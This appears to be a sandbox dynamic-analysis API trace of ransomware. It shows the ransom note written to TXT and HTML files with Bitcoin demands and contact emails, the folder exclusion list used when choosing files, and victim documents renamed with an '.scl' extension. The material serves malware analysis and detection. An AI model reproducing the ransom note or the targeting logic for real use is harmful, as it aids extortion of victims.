	[0187.065] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0187.065] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0187.068] CloseHandle (hObject=0x380) returned 1
	[0187.068] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0187.069] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.069] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0187.070] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0187.070] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0187.071] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0187.071] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0187.071] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0187.071] CloseHandle (hObject=0x380) returned 1
	[0187.071] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0187.072] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0187.072] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0187.072] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\HELP_DECRYPT_YOUR_FILES.HTML") returned 60
	[0187.072] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0187.074] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0187.074] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0187.077] CloseHandle (hObject=0x380) returned 1
	[0187.077] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0187.077] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0187.078] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.078] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0187.079] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0187.079] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0187.080] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0187.080] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0187.080] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0187.080] CloseHandle (hObject=0x380) returned 1
	[0187.081] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x890516eb, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x89077a34, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0187.081] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.*") returned 35
	[0187.081] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0187.081] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.*", cchLength=0x23 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\*.*") returned 0x23
	[0187.081] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.082] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="windows") returned 0x0
	[0187.082] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.082] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="boot") returned 0x0
	[0187.082] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.082] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="system volume information") returned 0x0
	[0187.082] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.083] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0187.083] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.083] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="temp") returned 0x0
	[0187.083] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.083] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="program files") returned 0x0
	[0187.083] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.084] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="program files (x86)") returned 0x0
	[0187.084] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.084] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="appdata") returned 0x0
	[0187.084] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.084] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="application data") returned 0x0
	[0187.084] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.085] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="winnt") returned 0x0
	[0187.085] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.085] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="tmp") returned 0x0
	[0187.085] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.085] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="cache") returned 0x0
	[0187.085] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.085] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="temporary internet files") returned 0x0
	[0187.086] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.086] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="webcache") returned 0x0
	[0187.086] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.086] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="inetcache") returned 0x0
	[0187.086] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.086] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="nvidia") returned 0x0
	[0187.086] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.087] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="packages") returned 0x0
	[0187.087] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.087] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="cookies") returned 0x0
	[0187.087] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.087] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="programdata") returned 0x0
	[0187.087] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0187.088] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0187.088] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x890516eb, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x89077a34, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0187.088] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0187.131] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x874efe9b, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x874efe9b, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x874efe9b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x2750, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-9z 1.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="-9Z1DO~1.SCL")) returned 1
	[0187.131] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x877c32d6, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x877c32d6, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x877c32d6, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x7c10, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-kauovy5h.xlsx.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="-KAUOV~1.SCL")) returned 1
	[0187.131] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8780f5e9, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8780f5e9, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x878358a6, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x7a20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0jwpqvra-.xlsx.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="0JWPQV~1.SCL")) returned 1
	[0187.131] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87e028cd, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x87e028cd, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x87e028cd, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x18910, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3v9wxvgs.ppt.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="3V9WXV~1.SCL")) returned 1
	[0187.131] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87e6f64d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x87e6f64d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x87e6f64d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x27b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7pmvrzg zr y.xlsx.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="7PMVRZ~1.SCL")) returned 1
	[0187.131] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87fa11dd, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x87fa11dd, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x87fa11dd, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x2ea0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cbjpukd2xjgfv_y57goc.pptx.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="CBJPUK~1.SCL")) returned 1
	[0187.131] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87fed67a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x87fed67a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x87fed67a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x9680, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cgfboykuyf.pdf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="CGFBOY~1.SCL")) returned 1
	[0187.131] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88085d5e, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x88085d5e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x88085d5e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x6530, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ddbbjy.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="DDBBJY~1.SCL")) returned 1
	[0187.131] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43649a85, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43649a85, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4372e947, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0187.131] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x880d258e, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x880d258e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x880f84e1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x3c60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="f1zd8ug2krjm.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="F1ZD8U~1.SCL")) returned 1
	[0187.132] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x881dd350, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x881dd350, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x881dd350, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x18e50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fo94sdtq.pptx.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="FO94SD~1.SCL")) returned 1
	[0187.132] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88229829, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x88229829, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x88229829, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x13710, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gqptmecbebpezg5.rtf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="GQPTME~1.SCL")) returned 1
	[0187.132] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x882e854c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x882e854c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x882e854c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x1c80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gruycjv3nf.ods.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="GRUYCJ~1.SCL")) returned 1
	[0187.132] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x883349a7, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x883349a7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x883349a7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x6a30, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="h8lzk9u.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="H8LZK9~1.SCL")) returned 1
	[0187.132] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89077a34, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x89077a34, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8909dba5, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0187.132] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89077a34, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x89077a34, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x89077a34, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0187.132] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8852462e, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8852462e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8854a881, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x32d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hnibzne3e.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="HNIBZN~1.SCL")) returned 1
	[0187.132] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88596e2a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x88596e2a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x885bd024, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x172b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hzoe.rtf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="HZOERT~1.SCL")) returned 1
	[0187.132] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8867bbb1, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8867bbb1, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x886a1d61, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xca00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ijljdu.pptx.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="IJLJDU~1.SCL")) returned 1
	[0187.132] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x886c81b5, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x886c81b5, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x886c81b5, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x700, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="k0sx.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="K0SXDO~1.SCL")) returned 1
	[0187.132] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x887145a5, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x887145a5, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x887145a5, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x5580, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="la6 2fm2gbg9o.xlsx.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="LA62FM~1.SCL")) returned 1
